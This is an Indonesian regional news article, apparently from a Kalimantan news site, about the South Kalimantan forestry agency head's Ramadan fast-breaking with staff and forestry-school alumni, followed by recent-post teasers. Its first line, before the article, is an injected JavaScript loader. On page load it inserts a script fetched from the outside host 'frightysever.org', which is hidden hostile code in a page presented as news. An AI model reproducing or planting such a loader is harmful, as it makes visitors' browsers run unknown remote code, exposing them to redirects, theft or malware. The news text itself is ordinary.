(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DISHUT PROV KALSEL

Kadishut: Rimbawan Kalsel Jangan Terkotak-Kotak


BANJARBARU, Kepala Dinas Kehutanan Provinsi Kalimantan Selatan, Hanif Faisol Nurofiq buka puasa bersama dengan para pejabat eselon 3 dan 4 beserta staf Dinas Kehutanan Kalsel, di Musala Assajaratun Thayyibah, Kantor Dinas Kehutanan Provinsi Kalimantan Selatan Jalan A. Yani Timur No 14 Banjarbaru, Minggu (19/5).

Ada yang berbeda pada perhelatan kali ini. Turut berhadir pula sekitar 100 orang alumnus Sekolah Kehutanan Menengah Atas (SKMA) dan Forest Ranger yang tergabung dalam wadah Ikatan Keluarga Alumni (IKA) SKMA Cabang Kalimantan Selatan.

Hanif pada kesempatan itu menyatakan bahwa buka puasa ini bertujuan mempererat tali silaturahmi sesama aparatur kehutanan.

“Bulan Ramadhan ini adalah waktu terbaik kita mempererat tali silaturahmi. Semoga kita dapat terus bersinergi dalam membangun kehutanan untuk kesejahteraan masyarakat,” tuturnya.

Sebagai rimbawan, lanjut dia, tidak boleh bangga dan merasa eksklusif dengan basik asal pendidikan SKMA dan Forest Ranger. Akan tetapi mulailah bersatu dan tidak terkotak-kotak. Jadilah satu korps rimbawan Kalsel yang siap membangun kehutanan,” ujarnya.

Hanif juga berpendapat bahwa hasil yang didapatkan Kalsel dari pembangunan sektor kehutanan masih belum maksimal. “Selama ini saya belum melihat dampak positif yang signifikan dari kegiatan rimbawan untuk menyejahterakan masyarakat,” imbuhnya.

Karenanya, ia mengimbau agar para alumnus bersama-sama membuktikan bahwa sektor kehutanan menjadi salah satu pemasukan daerah setelah pertambangan dan perkebunan.

Tanggung jawab sebagai rimbawan sebagaimana dituturkan Hanif, memiliki tugas yang sangat berat. Antara lain harus bisa menyukseskan kewajiban mereklamasi 511.000 hektare lahan kritis melalui penanaman tanaman “fast growing” dengan target 10 tahun bisa menghasilkan kayu.

“Selain rimbawan yang masih aktif, diharapkan kita semua harus bersama-sama membangun hutan Kalimantan Selatan kita tercinta. Walaupun kita telah memasuki masa purna tugas sekalipun. Kita harus terus berkarya, berkarya dan terus selalu berkarya sebagai rimbawan sampai kita tutup usia,”, tutupnya sambil memotivasi.

Diketahui, SKMA dan Forest Ranger merupakan sekolah kedinasan di bawah naungan Kementerian Lingkungan Hidup Kehutanan yang telah meluluskan ribuan tenaga teknis menengah kehutanan sebagai ujung tombak pengelolaan hutan di tingkat tapak.

Sejak tahun 2010-an SKMA telah ber-evolusi menjadi Sekolah Menengah Kejuruan (SMK) Kehutanan Negeri dan Forest Ranger telah ditutup di akhir tahun 2000-an lalu. (ria/bpth)

Reporter :Ria/bpdth
Editor :Cell

Desy Arfianty

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

1 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

1 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

2 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

3 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

5 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

6 jam ago

This website uses cookies.